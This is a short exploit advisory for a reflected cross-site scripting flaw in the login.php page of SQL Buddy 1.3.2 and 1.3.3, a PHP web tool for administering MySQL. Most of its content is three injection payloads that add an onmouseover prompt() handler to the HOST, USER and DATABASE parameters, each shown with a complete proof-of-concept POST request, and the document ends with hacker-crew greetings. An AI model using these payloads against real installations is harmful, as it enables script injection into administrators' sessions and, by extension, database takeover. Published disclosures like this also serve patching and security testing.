##################################################################################################
#
#Exploit Title : Sqlbuddy 1.3.2 & 1.3.3 Reflected Cross-Site Scripting 
#Author        : Govind Singh aka NullPort
#Vendor        : http://sqlbuddy.com/
#Download Link : https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip (Sqlbuddy 1.3.3)
#Date          : 14/07/2014
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to       : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi
#Greez to      : All IHT Members 
#           
###################################################################################################

about vendor :
SQL Buddy is an open source web based application written in PHP intended to handle the administration of MySQL and SQLite with the use of a Web browser. 
The project places an emphasis on ease of installation and a simple user interface.

Cross-Site Scripting vulnerability in "login.php" page with parameter "DATABASE" "HOST" & "USER" 
                                      ===========                     ===========================

HOST Payload : localhost" onmouseover=prompt(955794) bad="
PoC :

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=101
POSTDATA=ADAPTER=mysql&HOST=01/01/1967%22%20onmouseover%3dprompt(906831)%20bad%3d%22&USER=root&PASS=&DATABASE=
-----------------------------------------------------------------------------------------------------------------

USER payload : root" onmouseover=prompt(959474) bad="
PoC :

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=93
POSTDATA=ADAPTER=mysql&HOST=01%2F01%2F1967&USER=root" onmouseover=prompt(959474) bad="&PASS=&DATABASE=
----------------------------------------------------------------------------------------------------------------------

DATABASE pyaload : 01/01/1967" onmouseover=prompt(906831) bad="
PoC :

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=98
POSTDATA=ADAPTER=mysql&HOST=localhost&USER=root&PASS=&DATABASE=01/01/1967" onmouseover=prompt(906831) bad="
------------------------------------------------------------------------------------------------------------------